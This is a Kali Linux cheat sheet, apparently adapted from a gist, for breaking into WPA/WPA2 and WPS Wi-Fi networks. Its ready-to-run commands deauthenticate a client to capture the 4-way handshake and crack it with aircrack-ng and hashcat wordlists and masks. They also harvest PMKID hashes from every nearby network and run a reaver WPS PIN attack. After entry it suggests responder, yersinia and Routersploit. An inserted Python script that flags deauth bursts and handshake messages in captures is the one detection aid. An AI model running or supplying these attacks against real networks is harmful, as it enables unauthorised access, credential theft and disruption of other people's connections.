Gist version from https://gist.github.com/faisalfs10x/32631869686f7e03b8a70fc77e8555d2
airmon-ng - To enable/disable monitor mode on wireless interfaces
aireplay-ng - To inject frames into a wireless network (e.g. the deauthentication attack used below)
airodump-ng - Wireless packet capture tool used for packet capturing of raw 802.11 frames
aircrack-ng - An 802.11 WEP / WPA-PSK key cracker
wash - WiFi Protected Setup Scan Tool
reaver - WPS Pin Cracker/Bruteforcer
airodump-ng --bssid = AP MAC address
airodump-ng --essid = AP name (SSID)
airodump-ng -c / --channel = channel to listen on
aireplay-ng -a = AP MAC address
aireplay-ng -c = client MAC address
[C] = compulsory command
[O] = optional command
[O-1] = option 1, run either one option
kali $ sudo airmon-ng check kill #stop NetworkManager/wpa_supplicant so they do not interfere with monitor mode
[C] kali $ sudo airmon-ng start wlan0 #enable monitor mode. On recent Kali the interface may be renamed to wlan0mon; use that name in the commands below if so
[O] kali $ sudo airmon-ng start wlan0 8 #enable monitor mode locked to channel 8
[O] kali $ sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode monitor && sudo ifconfig wlan0 up #manual alternative without airmon-ng
[O] kali $ sudo airmon-ng #verify monitor mode is in use (iwconfig wlan0 shows the same "Mode:Monitor")
kali $ sudo aireplay-ng --test wlan0 #injection test; run it after monitor mode is enabled
kali $ sudo airodump-ng wlan0 -a --wps #scan all channels; -a shows only associated clients, --wps adds a WPS column
[C] kali $ sudo airodump-ng wlan0 -a --channel 11 --bssid A6:91:A8:02:01:9D
[O] kali $ sudo airodump-ng wlan0 -a --channel 11 --essid 'starbuxk-AP'
[C] Open 1st terminal - monitor the target network & capture the WPA/WPA2 4-way handshake. *Wait until "WPA handshake:" (or "PMKID found") appears in the top line of the airodump-ng output. -w sets the capture file prefix; airodump-ng appends -01, so the file is starbuxk-01.cap
kali $ sudo airodump-ng wlan0 -a -w starbuxk --channel 11 --bssid A6:91:A8:02:01:9D
[C] Open 2nd terminal - deauth attack - kick the target client off so it reconnects and performs the handshake. * -a = AP MAC address, -c = client MAC address
kali $ sudo aireplay-ng wlan0 --deauth 3 -a A6:91:A8:02:01:9D -c 0C:DD:24:9F:F1:91
kali $ aircrack-ng starbuxk-01.cap #without -w this only lists the networks in the capture and shows whether a handshake was captured
kali $ wireshark starbuxk-01.cap
Wireshark filter 'eapol' to see the 4-way handshake (messages 1-4)
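Added example (not part of the gist or of the aircrack-ng project): a small Python script that walks an airodump-ng style .cap (pcap, link type 105, raw 802.11 frames without a radiotap header) and reports the two things a capture reviewer or a wireless monitoring station cares about at this step: bursts of deauthentication frames per transmitter, which is what the deauth step above looks like on the air and what a wireless IDS alerts on, and which EAPOL-Key messages (M1..M4) of the 4-way handshake are present, the same view as the Wireshark 'eapol' filter. It builds its own constructed sample capture so it runs offline; the BSSID and client MAC are the placeholder values from this cheat sheet, and the deauth threshold (10 frames) and the key-info classification rules are my own choices.

```python
import struct
import sys
from collections import Counter

LINKTYPE_IEEE802_11 = 105          # airodump-ng .cap files: raw 802.11 frames, no radiotap header
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"

# Constructed sample addresses (the placeholder BSSID/client from the cheat sheet)
AP = "a6:91:a8:02:01:9d"
STA = "0c:dd:24:9f:f1:91"

def mac(s):
    return bytes.fromhex(s.replace(":", ""))

def fmt(b):
    return ":".join(f"{x:02x}" for x in b)

def deauth_frame(bssid, target, seq):
    """Management/deauthentication frame (FC 0xC0) from bssid to target, reason code 7."""
    return (b"\xc0\x00\x3a\x01" + mac(target) + mac(bssid) + mac(bssid)
            + struct.pack("<H", seq << 4) + struct.pack("<H", 7))

def eapol_key_frame(src, dst, bssid, from_ds, key_info):
    """Data frame carrying an EAPOL-Key message; only the key-info flags matter for the demo."""
    fc = b"\x08\x02" if from_ds else b"\x08\x01"            # FromDS (AP->STA) or ToDS (STA->AP)
    a1, a2, a3 = (dst, bssid, src) if from_ds else (bssid, src, dst)
    hdr = fc + b"\x00\x00" + mac(a1) + mac(a2) + mac(a3) + b"\x00\x00"
    # descriptor type 2 (RSN), key info, key length 16, zeroed counter/nonce/IV/RSC/ID/MIC, key-data len 0
    body = b"\x02" + struct.pack(">H", key_info) + b"\x00\x10" + bytes(88) + b"\x00\x00"
    return hdr + LLC_SNAP_EAPOL + b"\x02\x03" + struct.pack(">H", len(body)) + body

def build_pcap(frames):
    """Wrap raw 802.11 frames in a minimal little-endian pcap (constructed, for the demo)."""
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11))
    for i, fr in enumerate(frames):
        out += struct.pack("<IIII", 1700000000, i, len(fr), len(fr)) + fr
    return bytes(out)

def build_sample():
    """Constructed capture: 15 spoofed deauths from the AP's MAC, then a full M1..M4 handshake."""
    frames = [deauth_frame(AP, STA, i) for i in range(15)]
    frames += [eapol_key_frame(AP, STA, AP, True, 0x008A),    # M1: Ack
               eapol_key_frame(STA, AP, AP, False, 0x010A),   # M2: MIC
               eapol_key_frame(AP, STA, AP, True, 0x13CA),    # M3: Install+Ack+MIC+Secure+EncKeyData
               eapol_key_frame(STA, AP, AP, False, 0x030A)]   # M4: MIC+Secure
    return build_pcap(frames)

def iter_frames(pcap):
    magic, = struct.unpack_from("<I", pcap, 0)
    linktype, = struct.unpack_from("<I", pcap, 20)
    if magic != 0xA1B2C3D4 or linktype != LINKTYPE_IEEE802_11:
        raise ValueError("expected a little-endian pcap with link type 105 (raw 802.11)")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl, _ = struct.unpack_from("<IIII", pcap, off)
        off += 16
        yield pcap[off:off + incl]
        off += incl

def classify_key_info(key_info):
    """Map EAPOL-Key info flags to the 4-way handshake message number, or None."""
    mic, ack = key_info & 0x0100, key_info & 0x0080
    install, secure = key_info & 0x0040, key_info & 0x0200
    if ack and not mic:
        return 1
    if mic and ack and install:
        return 3
    if mic and not ack:
        return 4 if secure else 2
    return None

def analyse(pcap, deauth_threshold=10):
    deauths = Counter()
    msgs = set()
    for fr in iter_frames(pcap):
        if len(fr) < 24:
            continue
        ftype, subtype = (fr[0] >> 2) & 0x3, fr[0] >> 4
        if ftype == 0 and subtype == 12:                 # management / deauthentication
            deauths[fmt(fr[10:16])] += 1                 # addr2 = transmitter (spoofed as the AP by aireplay-ng)
        elif ftype == 2:                                 # data
            hlen = 26 if subtype & 0x08 else 24          # QoS data frames carry 2 extra header bytes
            if (fr[1] & 0x03) == 0x03:                   # 4-address (WDS) frames: addr4 present
                hlen += 6
            if fr[hlen:hlen + 8] == LLC_SNAP_EAPOL:
                eapol = fr[hlen + 8:]
                if len(eapol) >= 7 and eapol[1] == 3:    # EAPOL packet type 3 = EAPOL-Key
                    m = classify_key_info(int.from_bytes(eapol[5:7], "big"))
                    if m:
                        msgs.add(m)
    msgs = sorted(msgs)
    return {
        "deauth_bursts": {src: n for src, n in deauths.items() if n >= deauth_threshold},
        "handshake_msgs": msgs,
        # aircrack-ng/hashcat need M2 plus M1 or M3 (the MIC plus both nonces)
        "handshake_usable": 2 in msgs and (1 in msgs or 3 in msgs),
    }

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(analyse(data))
```

Run it with no arguments to see the constructed sample, or pass starbuxk-01.cap to review a real capture. A real capture that shows a deauth burst keyed by the AP's own MAC is the signature a wireless IDS uses for this attack; a missing M2 (or M2 without M1/M3) explains why aircrack-ng reports no usable handshake even though 'eapol' frames are visible.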
kali $ sudo airmon-ng stop wlan0 #disable monitor mode
kali $ sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode managed && sudo ifconfig wlan0 up #manual alternative
kali $ sudo systemctl restart NetworkManager #restart NetworkManager so the WiFi can be used normally again
kali $ aircrack-ng starbuxk-01.cap -w /usr/share/wordlists/rockyou.txt #dictionary attack on the captured handshake (note the directory is "wordlists")
kali $ sudo apt install hcxtools
kali $ hcxpcapngtool starbuxk-01.cap -o starbuxk.hc22000 #convert the capture to hashcat mode 22000 format
[O-1] windows $ hashcat.exe -O --force -a 0 -w 3 -m 22000 starbuxk.hc22000 rockyou.txt -r .\rules\dive.rule --session=wifi-cracking #dictionary attack mode with rules; feasible runtime.
[O-2] windows $ hashcat.exe -O --force -a 3 -w 3 -m 22000 starbuxk.hc22000 ?a?a?a?a?a?a?a?a?a --session=wifi-cracking #brute-force mode; only practical with a powerful GPU, and the full 9-character keyspace takes a very long time.
kali $ nmcli d wifi connect starbuxk-AP password wireless01 #connect with the recovered PSK (after leaving monitor mode)
kali $ sudo apt-get update && sudo apt-get -y install hcxtools
kali $ sudo hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0 #capturing PMKID hashes for all nearby networks
kali $ hcxpcapngtool -o hashes.hc22000 hcxdumptool_results.cap #convert to hashcat mode 22000 format (the older hcxpcaptool -k output is the old PMKID format for mode 16800, not 22000)
windows $ hashcat.exe -m 22000 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.hc22000 rockyou.txt #dictionary attack against the PMKID hashes
[O] Once you have access to a WiFi network, consider running the following Kali tools, and make sure you know what you are doing ;):
Routersploit against the router to check for known vulnerabilities
yersinia -G
responder -I wlan0 -wF #-I takes the interface name, not an IP address
wireshark
kali $ sudo airmon-ng start wlan0 #start monitor mode
kali $ sudo wash -a -i wlan0 #list APs with WPS enabled and whether WPS is locked
kali $ sudo aireplay-ng --fakeauth 30 -a C0:C9:E3:F8:2F:82 -h 00:C0:CA:92:7B:03 wlan0 #keep a fake association alive (re-auth every 30 s); -h = MAC of your own wlan0. Start this before reaver when using --no-associate
kali $ sudo reaver --bssid C0:C9:E3:F8:2F:82 --channel 2 --interface wlan0 -vvv --no-associate #WPS PIN attack; --no-associate relies on the aireplay-ng fake authentication above